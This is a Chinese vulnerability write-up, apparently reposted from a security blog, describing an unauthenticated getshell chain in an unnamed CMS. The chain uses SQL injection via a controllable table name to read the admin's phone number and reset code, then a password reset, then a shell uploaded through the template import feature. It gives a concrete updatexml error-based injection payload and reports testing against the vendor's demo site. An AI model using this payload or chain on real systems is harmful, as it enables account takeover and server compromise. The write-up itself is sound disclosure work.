某cms 无条件getshell

admin 2023年6月14日08:47:01某cms 无条件getshell已关闭评论33 views字数 485阅读1分37秒阅读模式

漏洞原理

sql查询表名可控,存在sql注入漏洞,通过sql注入,查询出管理员手机号和验证码,再通过忘记密码修改管理员密码,再后台导入模板处上传shell

漏洞利用

找到一处功能点,表名可控
blockchain

查看数据库日志,注入成功
某cms 无条件getshell
blockchain

对官方默认演示网站(https://duo.demo.mifenlei.com/)报错注入成功
blockchain

获取管理员手机号
blockchain

通过管理员手机号去找回密码,查询出管理员最新的一条验证码
model=file where 1=updatexml(1,concat(0x7e,(select ma from my_yanzhengma where phone=’18888888888’ and id = (select max(id) from my_yanzhengma) ),0x7e),1) — asd &id=123

blockchain

然后修改管理员密码,成功登录后台
某cms 无条件getshell
通过导入模板功能导入我们压缩后的shell文件,并且会把zip文件自动解压
某cms 无条件getshell
成功导入并且成功访问
某cms 无条件getshell
blockchain

总结

低版本没有导入功能的可以通过升级功能或者任意文件删除功能拿shell 详情可见本人博客 http://www.dcrblog.cn/archives/mifenlei01

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月14日08:47:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某cms 无条件getshellhttp://cn-sec.com/archives/1803662.html